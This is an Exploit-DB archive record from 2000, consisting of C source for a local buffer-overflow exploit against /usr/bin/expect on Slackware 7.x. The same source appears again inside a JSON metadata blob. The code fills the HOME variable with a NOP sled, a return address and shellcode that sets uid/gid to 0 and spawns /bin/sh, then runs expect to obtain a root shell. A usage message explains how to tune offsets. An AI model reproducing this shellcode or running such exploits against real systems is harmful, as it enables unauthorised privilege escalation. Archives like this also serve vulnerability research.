ID EDB-ID:218
Type exploitdb
Reporter isox
Modified 2000-12-04T00:00:00
Description
expect (/usr/bin/expect) buffer overflow. Local exploit for linux platform
/* hhp-expect_smash.c (12/11/00)
*
* expect (/usr/bin/expect) buffer overflow.
* Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
*
* By: isox
* Site: www.hhp-programming.net
* Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define OFFSET 0
#define BUFLEN 416
#define RET 0xbffff580 /* Slackware 7.1 */
#define EXPECT "/usr/bin/expect"
char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
"\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh\x69";
void usage(char *arg) {
fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
fprintf(stderr, "Examples:\n");
fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg);
fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg);
fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\n", arg, RET, RET + 429);
fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\n\n", arg, RET, RET - 429);
exit(1);
}
int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address;
int offset=OFFSET;
int i;
if((argc < 3) || (argc > 4))
usage(argv[0]);
if(argc == 3) {
if(!strcmp(argv[2], "up")) {
address = RET + atoi(argv[1]);
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
}
if(!strcmp(argv[2], "down")) {
address = RET - atoi(argv[1]);
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
}
}
if(argc >= 4) {
if(!strcmp(argv[2], "up")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));
}
if(!strcmp(argv[2], "down")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));
}
}
if (!(buf = (char *)malloc(BUFLEN))) {
printf("Can't allocate memory.\n");
exit(-1);
}
p = buf;
addressp = (long *) p;
for (i = 0; i < BUFLEN; i+=4) {
*(addressp++) = address;
}
for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BUFLEN - strlen(code) - 4);
for (i = 0; i < strlen(code); i++)
*(p++) = code[i];
buf[BUFLEN] = '\0';
setenv("HOME", buf, 1);
system(EXPECT);
}
// milw0rm.com [2000-12-04]
{"id": "EDB-ID:218", "hash": "2619f93edbc81bc50f3995bf2ca8ff60", "type": "exploitdb", "bulletinFamily": "exploit", "title": "expect /usr/bin/expect Buffer Overflow", "description": "expect (/usr/bin/expect) buffer overflow. Local exploit for linux platform", "published": "2000-12-04T00:00:00", "modified": "2000-12-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/218/", "reporter": "isox", "references": [], "cvelist": [], "lastseen": "2016-01-31T11:57:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T11:57:27"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/218/", "sourceData": "/* hhp-expect_smash.c (12/11/00)\r\n *\r\n * expect (/usr/bin/expect) buffer overflow.\r\n * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).\r\n *\r\n * By: isox\r\n * Site: www.hhp-programming.net\r\n * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define NOP\t\t\t\t0x90\r\n#define OFFSET\t\t\t0\r\n#define BUFLEN\t\t\t416\r\n#define RET\t\t\t\t0xbffff580\t\t\t/* Slackware 7.1 */\r\n#define EXPECT\t\t\t\"/usr/bin/expect\"\r\n\r\nchar code[] =\r\n \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x66\\x31\\xc0\\x66\\x31\"\r\n \"\\xdb\\xb0\\x2e\\xcd\\x80\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\"\r\n \"\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\"\r\n \"\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"\r\n \"\\xdc\\xff\\xff\\xff/bin/sh\\x69\";\r\n\r\nvoid usage(char *arg) {\r\n fprintf(stderr, \"\\nUsage: %s [offset up/down] [eip]\\n\\n\", arg);\r\n fprintf(stderr, \"Examples:\\n\");\r\n fprintf(stderr, \"\\t%s 347 up -=- Default EIP increased by 347 bytes\\n\", arg);\r\n fprintf(stderr, \"\\t%s 347 down -=- Default EIP decreased by 347 bytes\\n\", arg);\r\n fprintf(stderr, \"\\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\\n\", arg, RET, RET + 429);\r\n fprintf(stderr, \"\\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\\n\\n\", arg, RET, RET - 429);\r\n exit(1);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n char *buf, *p;\r\n long *addressp, address;\r\n int offset=OFFSET;\r\n int i;\r\n\r\n\r\n if((argc < 3) || (argc > 4))\r\n usage(argv[0]);\r\n\r\n if(argc == 3) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = RET + atoi(argv[1]);\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", RET + atoi(argv[1]));\r\n }\r\n\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = RET - atoi(argv[1]);\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", RET - atoi(argv[1]));\r\n }\r\n }\r\n\r\n if(argc >= 4) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));\r\n }\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));\r\n }\r\n }\r\n\r\n\r\n if (!(buf = (char *)malloc(BUFLEN))) {\r\n printf(\"Can't allocate memory.\\n\");\r\n exit(-1);\r\n }\r\n\r\n p = buf;\r\n addressp = (long *) p;\r\n\r\n for (i = 0; i < BUFLEN; i+=4) {\r\n *(addressp++) = address;\r\n }\r\n\r\n for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {\r\n buf[i] = NOP;\r\n }\r\n\r\n p = buf + (BUFLEN - strlen(code) - 4);\r\n\r\n for (i = 0; i < strlen(code); i++)\r\n *(p++) = code[i];\r\n\r\n buf[BUFLEN] = '\\0';\r\n\r\n\r\n setenv(\"HOME\", buf, 1);\r\n system(EXPECT);\r\n}\r\n\n\n// milw0rm.com [2000-12-04]\n", "osvdbidlist": ["60979"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}